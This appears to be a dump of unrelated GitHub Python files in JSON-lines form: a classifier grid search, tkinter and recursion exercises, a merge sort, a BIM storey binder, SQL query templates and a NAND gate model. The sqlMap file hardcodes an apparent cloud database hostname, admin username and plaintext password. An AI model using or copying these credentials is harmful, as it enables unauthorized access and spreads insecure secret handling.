StandardScaler\nimport sys\nfrom xgboost import XGBClassifier\n\n# pylint: disable=relative-beyond-top-level\nfrom .. import BASE_RESULTS_DIR\nfrom ... import VTE_CONT_INPUT_COLS, VTE_OUTPUT_COLS\nfrom ...data.vte import vte_slp_factory\nfrom .data_transforms import replace_hdl_tot_chol_with_ratio\nfrom ...utils.persist import persist_csv, persist_json, persist_pickle\n\n\n@persist_csv(\n target = BASE_RESULTS_DIR + \"/vte_whitened_scores.csv\",\n enabled = True, out_transform = lambda x: x[2]\n)\n@persist_json(\n target = BASE_RESULTS_DIR + \"/vte_whitened_params.json\",\n enabled = True, out_transform = lambda x: x[1]\n)\n@persist_pickle(\n target = BASE_RESULTS_DIR + \"/vte_whitened.pickle\",\n enabled = True, out_transform = lambda x: x[0]\n)\ndef fit_pca_whitened_classifiers(\n cv = 5, n_jobs = -1, verbose = False, report = False, random_seed = None\n):\n \"\"\"Fit classifiers to [non-]undersampled PCA-whitened input data.\n \n .. note:: Spits a lot of ``liblinear`` convergence warnings.\n\n We start with the top 7 columns by univariate ROC AUC for the VTE data.\n We perform a whitening PCA transform of the data and then fit classifiers\n with balanced class weights. Formerly oversampling of the minority class\n was done with the use of a :class:`sklearn.model_selection.PredefinedSplit`\n to prevent the oversampled data from leaking into the validation sets\n during the grid search (all oversampled data appended to end of training\n set and now allowed to be part of validation sets), but the improvement was\n not as much as one would have hoped (actually worse). So we ended up going\n back to just using balanced class weights.\n\n Use 5-fold (by default) cross-validation to choose the best parameters,\n refit on best, evaluate accuracy, precision, recall, ROC AUC.\n\n Note that we need a scaler before doing PCA. Use F1 score to pick model.\n\n :param cv: Number of CV splits to make when doing grid search.\n :type cv: int, optional\n :param n_jobs: Number of jobs to run in parallel when grid searching.\n Defaults to ``-1`` to distribute load to all threads.\n :type n_jobs: int, optional\n :param verbose: Verbosity of the\n :class:`~sklearn.model_selection.GridSearchCV` during searching/fitting.\n :type verbose: bool, optional\n :param report: If ``True``, print to stdout a report on model scores.\n :type report: bool, optional\n :param random_seed: A int seed to pass for multiple calls to this function\n to be reproducible. Leave ``None`` for stochastic behavior.\n :type random_state: int, optional\n :rtype: tuple\n \"\"\"\n if cv < 3:\n raise ValueError(\"cv folds must be 3 or more\")\n # use only the top seven columns selected by univariate AUC\n best_cols = list(\n pd.read_csv(\n BASE_RESULTS_DIR + \"/vte_selected_cols.csv\", index_col = 0\n ).index\n )\n # get data set of continuous features from vte_slp_factory\n X_train, X_test, y_train, y_test = vte_slp_factory(\n data_transform = replace_hdl_tot_chol_with_ratio,\n inputs = best_cols, targets = VTE_OUTPUT_COLS, dropna = True,\n random_state = random_seed\n )\n # fit StandardScaler and use to transform data\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train, X_test = scaler.transform(X_train), scaler.transform(X_test)\n # fit PCA and transform data yet again (whiten)\n pca = PCA(whiten = True, random_state = random_seed)\n pca.fit(X_train)\n X_train, X_test = pca.transform(X_train), pca.transform(X_test)\n # list of base estimator names for use in Pipeline and parameter naming\n base_names = (\n \"l2_logistic\", \"l2_linsvc\", \"bagged_l2_logistic\", \"bagged_l2_linsvc\",\n \"rbf_svc\", \"xgboost\", \"random_forest\"\n )\n ## hyperparameter grids for each model ##\n # note that intercepts are not fitted since data are centered + scaled.\n # l2-regularized logistic regression (baseline model)\n lrc_l2_grid = dict(\n penalty = [\"l2\"],\n C = [1],\n fit_intercept = [True],\n max_iter = [100],\n class_weight = [\"balanced\"]\n )\n # linear SVM with l2 penalty (baseline model)\n lsvc_l2_grid = dict(\n penalty = [\"l2\"],\n loss = [\"hinge\", \"squared_hinge\"],\n dual = [True],\n random_state = [random_seed],\n C = [1, 5, 10],\n fit_intercept = [True],\n class_weight = [\"balanced\"]\n )\n # bagged logistic regression model with l2 penalty\n bag_lrc_l2_grid = dict(\n base_estimator = [\n LogisticRegression(fit_intercept = True, class_weight = \"balanced\")\n ],\n n_estimators = [100, 200, 400],\n random_state = [random_seed]\n )\n # bagged linear SVM with l2 penalty (use default parameters + hinge loss)\n bag_lsvc_l2_grid = dict(\n base_estimator = [\n LinearSVC(loss = \"hinge\", fit_intercept = True,\n class_weight = \"balanced\", random_state = random_seed)\n ],\n n_estimators = [100, 200, 400],\n random_state = [random_seed]\n )\n # RBF support vector classifier\n rbf_svc_grid = dict(\n C = [0.1, 1, 5],\n kernel = [\"rbf\"],\n gamma = [\"scale\", \"auto\"],\n class_weight = [\"balanced\"]\n )\n # compute ratio of 0 instances to 1 instances to get XGBoost\n # scale_pos_weight parameter (use training data only! don't be biased)\n neg_pos_ratio = (y_train == 0).sum() / (y_train == 1).sum()\n # XGBoost classifier\n xgb_grid = dict(\n max_depth = [3],\n n_estimators = [400, 600, 800],\n learning_rate = [0.1],\n booster = [\"gbtree\"],\n subsample = [0.5],\n reg_lambda = [0.1, 1],\n random_state = [random_seed],\n scale_pos_weight = [neg_pos_ratio]\n )\n # random forest classifier. note that according to ESL II, full trees are\n # fine to grow and allow you to have one less tuning parameter, but it's\n # still better to limit the overall tree depth.\n rf_grid = dict(\n max_depth = [6, 12, 24],\n n_estimators = [100, 200, 400],\n criterion = [\"entropy\"],\n random_state = [random_seed],\n class_weight = [\"balanced\"]\n )\n # models to use in our grid searches\n base_models = (\n LogisticRegression(), LinearSVC(), BaggingClassifier(),\n BaggingClassifier(), SVC(), XGBClassifier(), RandomForestClassifier()\n )\n base_names = (\n \"l2_logistic\", \"l2_linsvc\", \"bagged_l2_logistic\", \"bagged_l2_linsvc\",\n \"rbf_svc\", \"xgboost\", \"random_forest\"\n )\n # grid search parameters for all the models\n param_grids = (\n lrc_l2_grid, lsvc_l2_grid, bag_lrc_l2_grid, bag_lsvc_l2_grid,\n rbf_svc_grid, xgb_grid, rf_grid\n )\n # dictionary to hold saved model results for VTE classification problem.\n mdata = {}\n # dictionary to hold saved model hyperparameters for plaintext persistence.\n mparams = {}\n # DataFrame indexed by name of the model where columns are accuracy,\n # precision, and recall for each model\n mscores = pd.DataFrame(\n index = base_names, \n columns = [\"accuracy\", \"precision\", \"recall\", \"roc_auc\"]\n )\n # for each model, train + record results into mdata, mparams, and mscores\n for base_name, base_model, param_grid, in zip(\n base_names, base_models, param_grids):\n # instantiate and fit the GridSearchCV object. may spit mad warnings.\n model = GridSearchCV(\n base_model, param_grid, scoring = \"f1\", cv = cv,\n n_jobs = n_jobs, verbose = int(verbose)\n )\n # fit\n model.fit(X_train, y_train)\n # save model to mdata using model name\n mdata[base_name] = model\n # get hyperparameters of the best estimated model\n params = model.best_estimator_.get_params()\n # if there are any predictors as a parameter, replace them with their\n # parameters from get_params (for ensemble models)\n for name in params.keys():\n if hasattr(params[name], \"get_params\"):\n params[name] = params[name].get_params()\n # save hyperparameters to mparams\n mparams[base_name] = params\n # compute test predictions using refit model on X_test\n y_pred = model.predict(X_test)\n # get decision function values for computing ROC AUC. if it isn't\n # present, try the predict_proba method\n if hasattr(model, \"decision_function\"): \n y_pred_scores = model.decision_function(X_test)\n elif hasattr(model, \"predict_proba\"):\n # we only want probabilities for the greater class\n y_pred_scores = model.predict_proba(X_test)[:, 1]\n else:\n print(\n f\"warning: {model.__class__.__name__} can't compute ROC AUC \"\n \"score; does not have decision_function or predict_proba\",\n file = sys.stderr\n )\n y_pred_scores = None\n # save accuracy, precision, and recall to in mscores\n mscores.loc[base_name, :] = (\n accuracy_score(y_test, y_pred), precision_score(y_test, y_pred),\n recall_score(y_test, y_pred),\n np.nan if y_pred_scores is None else roc_auc_score(\n y_test, y_pred_scores\n )\n )\n # if report is True, print mscores to stdout\n if report:\n print(\"---- classifier quality metrics \", end = \"\")\n print(\"-\" * 48, end = \"\\n\\n\")\n print(mscores)\n # return results that can get picked up by decorators\n return mdata, mparams, mscores\n\n\nif __name__ == \"__main__\":\n # fit_pca_whitened_classifiers(report = True, random_seed = 7)\n pass","repo_name":"crb479/mcdevitt-trauma-ml","sub_path":"mtml/modeling/vte/mixed_models.py","file_name":"mixed_models.py","file_ext":"py","file_size_in_byte":10376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"30974689357","text":"#设置撤销功能\nfrom tkinter import *\nimport hashlib #---想要获得md5的值需要调用的必须\nroot = Tk()\n\ntext = Text(root,width=30,height=5,undo=True,autoseparators=False)#------在这里必须打开他的undo 默认为False\n #_-有一个自以为是的做法就是他默认这句话是没有结束的 一次撤销所有的输入就都没了\n #-在这里可以设置他的autoseparators=Fslse\ntext.pack()\ntext.insert(INSERT,\"王者荣耀之上官婉儿132465464王王王王\")\ndef callback(event):\n text.edit_separator()\n\ntext.bind('',callback)#----定义每当有一个按键输入 就插入一个分隔符 也就是说每次输入 都算一个栈\ndef show():\n text.edit_undo()#------如果点击这个按钮 则撤销操作\nButton(root,text=\"撤销\",command=show).pack()\n\n\n\n\nmainloop()","repo_name":"jiangfeng123/pygame","sub_path":"每日任务/爬虫的自我修养/gui的最终选择 tkinter/Text超级组件/撤销操作.py","file_name":"撤销操作.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27709494791","text":"from bim2sim.task.base import ITask\nfrom bim2sim.utilities.common_functions import filter_instances\nfrom bim2sim.workflow import Workflow\n\n\nclass BindStoreys(ITask):\n reads = ('instances', )\n touches = ('instances', )\n\n def run(self, workflow: Workflow, instances: dict):\n \"\"\"Bind thermal_zones and instances to each floor/storey and vice\n versa\"\"\"\n self.logger.info(\"Binding bim2sim instances to storeys\")\n storeys = filter_instances(instances, 'Storey')\n for storey in storeys:\n storey_instances = []\n for ifc_structure in storey.ifc.ContainsElements:\n for ifc_element in ifc_structure.RelatedElements:\n instance = instances.get(ifc_element.GlobalId, None)\n if instance:\n storey_instances.append(instance)\n if storey not in instance.storeys:\n instance.storeys.append(storey)\n\n storey_spaces = []\n for ifc_aggregates in storey.ifc.IsDecomposedBy:\n for ifc_element in ifc_aggregates.RelatedObjects:\n instance = instances.get(ifc_element.GlobalId, None)\n if instance:\n storey_spaces.append(instance)\n if storey not in instance.storeys:\n instance.storeys.append(storey)\n\n storey.storey_instances = storey_instances\n storey.thermal_zones = storey_spaces\n return instances,\n","repo_name":"BIM2SIM/bim2sim","sub_path":"bim2sim/task/common/bind_storeys.py","file_name":"bind_storeys.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"13510972781","text":"def factorial(n):\r\n if n<1:\r\n return 1\r\n else:\r\n e=n*factorial(n-1)\r\n return e\r\n\r\nr=factorial(4)\r\ndef fibonacci(n):\r\n assert n>=0 and int(n)==n,'fibonacci no cant be negative or non integer'\r\n try:\r\n if n in [0,1]:\r\n return n\r\n\r\n else:\r\n return fibonacci(n-1)+fibonacci(n-2)\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\nprint(fibonacci(5))\r\nprint(40%6)\r\n\r\ndef sum_digit(n):\r\n assert n>=0 and type(n)==int,\"only integer\"\r\n if n==0:\r\n return 0\r\n\r\n else:\r\n\r\n return int(n%10) + sum_digit(int(n/10))\r\n\r\n\r\nprint(sum_digit(11.2))\r\n\r\ndef power(base,exp):\r\n assert exp>=0 and int(exp)==exp\r\n if exp==0:\r\n return 1\r\n if exp==1:\r\n return base\r\n return base*power(base,exp-1)\r\n\r\nprint(power(2,-4))\r\ndef gcd(a,b):\r\n if b==0:\r\n return a\r\n else:\r\n return gcd(b,a%b)\r\n\r\nprint(gcd(48,64))\r\n\r\n\r\ndef decimaltobinary(n):\r\n if n==0:\r\n return 0\r\n\r\n else:\r\n return n%2+10*decimaltobinary(int(n/2))\r\nprint(decimaltobinary(10))\r\n\r\ndef reverse(string):\r\n if len(string)<=1:\r\n return string\r\n\r\n return string[len(string)-1] + reverse(string[0:len(string)-1])\r\n\r\nprint(reverse(\"python\"))\r\n\r\ndef recursiveRange(num):\r\n if num <=0:\r\n return 0\r\n\r\n return num + recursiveRange(num-1)\r\n\r\n\r\nprint(recursiveRange(6))\r\n\r\n\r\ndef productofarray(arr):\r\n if len(arr)==0:\r\n return 1\r\n\r\n\r\n return arr[0]*productofarray(arr[1:])\r\n\r\n\r\nprint(productofarray([1,2,3]))\r\n\r\n\r\ndef power(base,exponent):\r\n if exponent==0:\r\n return 1\r\n\r\n\r\n return base*power(base,exponent-1)\r\n\r\nprint(power(2,0))\r\n\r\ndef ispallindrome(strng):\r\n if len(strng)==0:\r\n return True\r\n\r\n if strng[0] != strng[len(strng)-1]:\r\n return False\r\n\r\n\r\n return ispallindrome(strng[1:-1])\r\n\r\n\r\nprint(ispallindrome('tacocat'))\r\n\r\n\r\ndef capitalizefirst(arr):\r\n result=[]\r\n if len(arr)==0:\r\n return result\r\n result.append(arr[0][0].upper() + arr[0][1:])\r\n return result+capitalizefirst(arr[1:])\r\n\r\nprint(capitalizefirst(['car', 'taco', 'banana']))\r\n\r\ndef capitalizewords(arr):\r\n result =[]\r\n if len(arr)==0:\r\n return result\r\n\r\n result.append(arr[0].upper())\r\n return result + capitalizewords(arr[1:])\r\n\r\nwords = ['i', 'am', 'learning', 'recursion']\r\n\r\nprint(capitalizewords(words))\r\n\r\n\r\ndef stringifyNumbers(obj):\r\n newobj=obj\r\n for key in newobj:\r\n if type(newobj[key]) is int :\r\n newobj[key]=str(newobj[key])\r\n if type(newobj[key]) is dict:\r\n newobj[key]=str(newobj[key])\r\n\r\n return newobj\r\n\r\nobj = {\r\n \"num\": 1,\r\n \"test\": [],\r\n \"data\": {\r\n \"val\": 4,\r\n \"info\": {\r\n \"isRight\": True,\r\n \"random\": 66\r\n }\r\n }\r\n}\r\n\r\nprint(stringifyNumbers(obj))\r\n","repo_name":"Saketkr06/Data-Structures-and-Algorithms-in-python","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4952931383","text":"import json\nfrom jsonref import replace_refs\nfrom openapi_schema_to_json_schema import to_json_schema\n\njson_file = open('docs.json','r')\n\nopenapi_schema = json.load(json_file)\n\noptions = {\"supportPatternProperties\": True}\nconverted = to_json_schema(openapi_schema, options)\ntry:\n converted2 = replace_refs(converted)\nexcept Exception as exp:\n print(exp)\n\nprint(json.dumps(converted2, indent=2))\n","repo_name":"teralin01/elle_web","sub_path":"doc/json_test.py","file_name":"json_test.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38028991150","text":"import time\nimport random\n\ndef intercalate(array, start, middle, end):\n global inversoes\n global total, l\n beginning = start\n j = middle + 1\n final_array = []\n while(start <= middle and j <= end):\n if(array[start] < array[j]):\n final_array.append(array[start])\n start += 1\n else:\n final_array.append(array[j])\n j += 1\n while( start <= middle):\n final_array.append(array[start])\n start += 1\n\n while(j <= end):\n\n final_array.append(array[j])\n j += 1\n\n # w = 0\n # for i in range(start, n+1):\n # array[i] = final_array[w]\n # w += 1\n array[beginning:end+1] = final_array\n\n\n\ndef mergeSortRec(array, i, j):\n if(i == j): return\n k = int((i+j)/2)\n mergeSortRec(array, i, k)\n mergeSortRec(array, k+1, j)\n intercalate(array, i, k, j)\n # intercalate(intercalate(i, 0, len(i)//2, len(i)-1), intercalate(k+1, 0, len(k+1)//2, len(k+1)-1)) \n\n\n# array = [random.randint(1,100000000) for _ in range(100000000)]\n\n# start_time = time.clock()\narray = [5,2,7,0,1,4]\nmergeSortRec(array, 0, len(array)-1)\n# array.sort()\n\n# print(time.clock() - start_time, \"seconds\")\nprint(array)\n\n","repo_name":"douglasgondim/University","sub_path":"Construction and Analysis of Algorithms/codes/mergesortRec.py","file_name":"mergesortRec.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2785202957","text":"#First Approach\n'''from collections import defaultdict\n\ncnt = defaultdict(lambda : 0)\nfor _ in range(int(input())):\n a,b = list(map(int,input().split()))\n for i in range(a,b+1):\n cnt[i] += 1\n\nprint(max(cnt.values()))'''\n\n#Optimal Approach\narrival = []\nleave = []\nn = int(input())\nfor _ in range(n):\n a,b = list(map(int,input().split()))\n arrival.append(a)\n leave.append(b)\n\narrival.sort()\nleave.sort()\ni,j = 0,0\ncurr = 0\nma = 0\nwhile i ma:\n ma = curr\nprint(ma)\n \n\n\n\n\n\n\n\n\n\n","repo_name":"pradyutnathradhae/interview_Program","sub_path":"mixed_problems/restaurantcustomers.py","file_name":"restaurantcustomers.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28776870590","text":"'''\r\nCreated on 2015. 5. 14.\r\n\r\n@author: Jay\r\n'''\r\n\r\n\r\nclass sqlMap:\r\n \r\n connectInfo = (\"kirudadb.c5rq93advanj.us-west-2.rds.amazonaws.com\", \"admin\",\r\n \"1qaz2wsx\", \"kirudaDB\")\r\n \r\n selectStockInfo = \" \\\r\n SELECT \\\r\n A.CODE, A.XPATH, A.ARRAYNUM, B.URL1, B.URL2, A.DATANAME, A.SITECODE \\\r\n FROM \\\r\n (SELECT \\\r\n XPATH, ARRAYNUM, SITECODE, CODE, DATANAME, YN\\\r\n FROM \\\r\n SITE_DATA) A, \\\r\n (SELECT \\\r\n URL1, URL2, CODE \\\r\n FROM \\\r\n SITE_INFO) B \\\r\n WHERE \\\r\n A.SITECODE = B.CODE\\\r\n AND A.YN = 'Y'\"\r\n\r\n SELECTSITEDATA_XPATH = \"\\\r\n SELECT \\\r\n DISTINCT(XPATH) \\\r\n FROM \\\r\n SITE_DATA \\\r\n WHERE \\\r\n YN = 'Y' \\\r\n AND DATATYPE = '%s'\"\r\n \r\n SELECTPARSEINGINFO = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = '%s'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n SELECTTRADERINFO_XPATH = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = 'xpath_da_trader01'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n SELECTFRGNINFO_XPATH = \" \\\r\n SELECT \\\r\n A.DATANAME, B.URL1, B.URL2, C.XPATH, A.ARRAYNUM \\\r\n FROM \\\r\n SITE_DATA A, \\\r\n SITE_INFO B, \\\r\n XPATH_INFO C \\\r\n WHERE \\\r\n C.CODE = A.XPATH \\\r\n AND B.CODE = A.SITECODE \\\r\n AND A.YN = 'Y' \\\r\n AND A.XPATH = 'xpath_na_frgn01'\\\r\n ORDER BY A.ARRAYNUM\"\r\n \r\n selectSiteDataDaily = \" \\\r\n SELECT \\\r\n A.CODE, A.XPATH, A.ARRAYNUM, B.URL1, B.URL2, A.DATANAME, A.SITECODE \\\r\n FROM \\\r\n (SELECT \\\r\n XPATH, ARRAYNUM, SITECODE, CODE, DATANAME, YN, DATATYPE\\\r\n FROM \\\r\n SITE_DATA) A, \\\r\n (SELECT \\\r\n URL1, URL2, CODE \\\r\n FROM \\\r\n SITE_INFO) B \\\r\n WHERE \\\r\n A.SITECODE = B.CODE\\\r\n AND A.YN = 'Y'\\\r\n AND A.DATATYPE IN ('D')\" \r\n \r\n insertStockData = \" \\\r\n INSERT INTO \\\r\n %s ( %s ) \\\r\n VALUES \\\r\n ( %s )\"\r\n \r\n insertStockSisaeData = \" \\\r\n INSERT INTO \\\r\n STOCK_SISAE ( %s ) \\\r\n VALUES \\\r\n ( %s ) \\\r\n ON DUPLICATE KEY UPDATE \\\r\n LOANDONE = IF(VALUES(LOANDONE) IS NOT NULL,VALUES(LOANDONE),LOANDONE), \\\r\n LOANCLEAN = IF(VALUES(LOANCLEAN) IS NOT NULL,VALUES(LOANCLEAN),LOANCLEAN), \\\r\n LOANBALANCEVOL = IF(VALUES(LOANBALANCEVOL) IS NOT NULL,VALUES(LOANBALANCEVOL),LOANBALANCEVOL), \\\r\n LOANBALANCENTL = IF(VALUES(LOANBALANCENTL) IS NOT NULL,VALUES(LOANBALANCENTL),LOANBALANCENTL), \\\r\n SHORTVOLUMERATIO = IF(VALUES(SHORTVOLUMERATIO) IS NOT NULL,VALUES(SHORTVOLUMERATIO),SHORTVOLUMERATIO), \\\r\n SHORTVOLUME = IF(VALUES(SHORTVOLUME) IS NOT NULL,VALUES(SHORTVOLUME),SHORTVOLUME), \\\r\n SHORTNOTIONAL = IF(VALUES(SHORTNOTIONAL) IS NOT NULL,VALUES(SHORTNOTIONAL),SHORTNOTIONAL)\"\r\n \r\n INSERTDATAWITHOUTPARENTHESES = \"\\\r\n INSERT INTO \\\r\n %s %s \\\r\n VALUES \\\r\n %s \"\r\n \r\n selectStockCode = \" \\\r\n SELECT \\\r\n CODE, TICKER, MARKET \\\r\n FROM \\\r\n STOCK_INFO \"\r\n \r\n selectDataInfo = \" \\\r\n SELECT \\\r\n CODE, UNIT, CCY_CD \\\r\n FROM \\\r\n DATA_INFO \\\r\n WHERE \\\r\n SITECODE = '%s' \\\r\n AND CODE = '%s' \"\r\n \r\n selectXpathInfo = \"\\\r\n SELECT \\\r\n XPATH \\\r\n FROM \\\r\n XPATH_INFO \\\r\n WHERE \\\r\n CODE = '%s' \"\r\n \r\n INSERTSTOCKLIST = \" \\\r\n INSERT INTO\\\r\n STOCK_INFO\\\r\n (CODE, TICKER, MARKET, CREATE_DATE) \\\r\n VALUES \\\r\n %s \\\r\n ON DUPLICATE KEY UPDATE \\\r\n CODE = VALUES(CODE), \\\r\n TICKER = VALUES(TICKER), \\\r\n MARKET = VALUES(MARKET), \\\r\n mod_date = NOW() \"\r\n \r\n INSERTFRGNDATA = \" \\\r\n INSERT INTO \\\r\n STOCK_SISAE \\\r\n (CODE, DATE, NETVOLUME_INSTITUTION, NETVOLUME_FOREIGN, foreignHoldingStock, FOREIGNSTOCKHOLDINGPERCENT) \\\r\n VALUES \\\r\n %s \\\r\n ON DUPLICATE KEY UPDATE \\\r\n NETVOLUME_INSTITUTION = VALUES(NETVOLUME_INSTITUTION), \\\r\n NETVOLUME_FOREIGN = VALUES(NETVOLUME_FOREIGN), \\\r\n foreignHoldingStock = VALUES(foreignHoldingStock), \\\r\n FOREIGNSTOCKHOLDINGPERCENT = VALUES(FOREIGNSTOCKHOLDINGPERCENT)\"\r\n \r\n SELECTTRADERINFO = \"\\\r\n SELECT \\\r\n * \\\r\n FROM \\\r\n TRADER_INFO\"\r\n \r\n SELECTHISTORICALSTOCKPRICES = \"\\\r\n SELECT \\\r\n date, currentPrice \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND (%s) \"\r\n \r\n SELECTHISTORICALSTOCKSISAE = \"\\\r\n SELECT \\\r\n * \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND (%s) \"\r\n \r\n SELECTHISTORICALSTOCKPRICES2 = \"\\\r\n CALL PC_SLT_HISTSTOCKPRICE %s\"\r\n \r\n SELECTHISTSTOCKSISAE = \"\\\r\n CALL PC_SLT_HISTSTOCKSISAE %s\"\r\n \r\n SELECTTRAININGDATA = \"\\\r\n SELECT \\\r\n IFNULL(CURRENTPRICE, 0) \\\r\n FROM \\\r\n STOCK_SISAE \\\r\n WHERE \\\r\n CODE = '%s' \\\r\n AND date = '%s'\" ","repo_name":"quantosauros/KirudaEngine","sub_path":"kirudaEngine/util/DB/sqlMap.py","file_name":"sqlMap.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70893269585","text":"from part import Part, PartFactory\n\nimport util\n\nclass Nand(PartFactory):\n\n ''' A generic N-input NAND component '''\n\n def __init__(self, ident, inputs, delay, invert):\n super().__init__(ident)\n self.inputs = inputs\n self.scm = False\n self.comp = None\n self.delay = delay\n self.invert = invert\n\n def state(self, file):\n ''' Extra state variable '''\n\n file.write(\"\\tint job;\\n\")\n file.write(\"\\tint out;\\n\")\n file.write(\"\\tunsigned dly;\\n\")\n\n def init(self, file):\n ''' Extra initialization '''\n\n file.write(\"\\tstate->dly = %d;\\n\" % self.delay)\n\n file.fmt('''\n\t\t|\tstate->out = -1;\n\t\t|\tstate->job = 0;\n\t\t|\tif (strstr(this->name(), \"IOC.ioc_54.RDNAN0A\") != NULL) {\n\t\t|\t\t// TEST_MACRO_EVENT_SLICE.IOC @ optimized\n\t\t|\t\tstate->dly = 10;\n\t\t|\t}\n\t\t|\tif (strstr(this->name(), \"IOC.ioc_54.RDNAN0B\") != NULL) {\n\t\t|\t\t// TEST_MACRO_EVENT_DELAY.IOC @ optimized\n\t\t|\t\tstate->dly = 10;\n\t\t|\t}\n\t\t|\tif (strstr(this->name(), \"TYP.typ_40.CKDR5A\") != NULL) {\n\t\t|\t\t// TEST_LOOP_CNTR_OVERFLOW.TYP @ main\n\t\t|\t\tstate->dly = 2;\n\t\t|\t}\n\t\t|''')\n\n def sensitive(self):\n ''' sensitivity list '''\n\n for i in range(self.inputs):\n yield \"PIN_D%d\" % i\n\n def doit(self, file):\n ''' The meat of the doit() function '''\n\n super().doit(file)\n\n file.write(\"\\tconst int active = %d;\\n\" % (not self.invert))\n\n file.fmt('''\n\t\t|\n\t\t|\tTRACE(\n\t\t|\t << \" j \" << state->job\n\t\t|\t << \" out \" << state->out\n\t\t|\t << \" in \"\n\t\t|''')\n\n for i in range(self.inputs):\n file.write(\"\\t << PIN_D%d\\n\" % i)\n\n file.fmt('''\n\t\t|\t);\n\t\t|\n\t\t|\tif (state->job) {\n\t\t|\t\tPIN_Q<=(state->out);\n\t\t|\t\tstate->job = false;\n\t\t|\t}\n\t\t|\n\t\t|''')\n\n file.write(\"\\n\\tif (\\n\\t \")\n\n i = []\n for node in self.comp:\n if node.pin.name != \"Q\":\n i.append(\"PIN_%s=>\" % node.pin.name)\n file.fmt(\" &&\\n\\t \".join(i))\n\n file.fmt('''\n\t\t|\n\t\t|\t) {\n\t\t|\t\tif (state->out != active) {\n\t\t|\t\t\tstate->out = active;\n\t\t|\t\t\tif (state->dly == 0) {\n\t\t|\t\t\t\tPIN_Q<=(state->out);\n\t\t|\t\t\t} else {\n\t\t|\t\t\t\tstate->job = true;\n\t\t|\t\t\t\tnext_trigger(state->dly, SC_NS);\n\t\t|\t\t\t}\n\t\t|\t\t}\n\t\t|\t} else {\n\t\t|\t\tif (state->out != !active) {\n\t\t|\t\t\tstate->out = !active;\n\t\t|\t\t\tif (state->dly == 0) {\n\t\t|\t\t\t\tPIN_Q<=(state->out);\n\t\t|\t\t\t} else {\n\t\t|\t\t\t\tstate->job = true;\n\t\t|\t\t\t\tnext_trigger(state->dly, SC_NS);\n\t\t|\t\t\t}\n\t\t|''')\n\n if self.inputs > 1:\n for node in self.comp:\n if node.pin.name != \"Q\":\n file.fmt(\"\\t\\t} else if (!PIN_%s=>) {\\n\" % node.pin.name)\n file.fmt(\"\\t\\t\\tnext_trigger(PIN_%s.default_event());\\n\" % node.pin.name)\n\n file.fmt('''\n\t\t|\t\t}\n\t\t|\t}\n\t\t|''')\n\n def hookup(self, file, comp):\n pno = 0\n for node in comp:\n if node.pin.name == \"Q\":\n file.write(\"\\t%s.PIN_Q(%s);\\n\" % (comp.name, node.net.cname))\n else:\n file.write(\"\\t%s.PIN_D%d(%s);\\n\" % (comp.name, pno, node.net.cname))\n pno += 1\n\nclass ModelNand(Part):\n ''' Model NAND components '''\n\n def __init__(self, delay, invert):\n super().__init__(\"NAND\")\n self.delay = delay\n self.invert = invert\n\n def assign(self, comp, _part_lib):\n ''' Assigned to component '''\n seen = set()\n ninputs = 0\n rnodes = list(comp)\n for node in rnodes:\n # > 2 is special case for IOC::IPNOR0C etc.\n if node.net.is_pu() and len(rnodes) > 2:\n # print(\"Eliminating NAND PU input\", node)\n node.remove()\n continue\n if node.net in seen:\n # print(\"Eliminating NAND input\", node)\n node.remove()\n continue\n seen.add(node.net)\n if node.pin.name == \"Q\":\n node.pin.set_role(\"output\")\n else:\n node.pin.set_role(\"input\")\n ninputs += 1\n if not ninputs:\n print(\"NAND with no inputs left\", ninputs, comp)\n for i in rnodes:\n print(\" \", i)\n assert ninputs\n\n def configure(self, comp, part_lib):\n i = []\n j = 0\n for node in list(comp):\n if node.pin.name != \"Q\":\n node.pin.name = \"D%d\" % j\n j += 1\n if node.net.sc_type == \"bool\":\n i.append(\"B\")\n else:\n i.append(\"L\")\n inputs = len(comp.nodes) - 1\n sig = util.signature(i)\n ident = \"AND%d_\" % inputs + \"%d_\" % self.delay + sig\n if self.invert:\n ident = \"N\" + ident\n if ident not in part_lib:\n part_lib.add_part(ident, Nand(ident, inputs, self.delay, self.invert))\n comp.part = part_lib[ident]\n\ndef register(part_lib):\n ''' Register component model '''\n\n part_lib.add_part(\"F00\", ModelNand(0, True))\n part_lib.add_part(\"F04\", ModelNand(5, True))\t# Inverters are juvenile NAND gates\n part_lib.add_part(\"F08\", 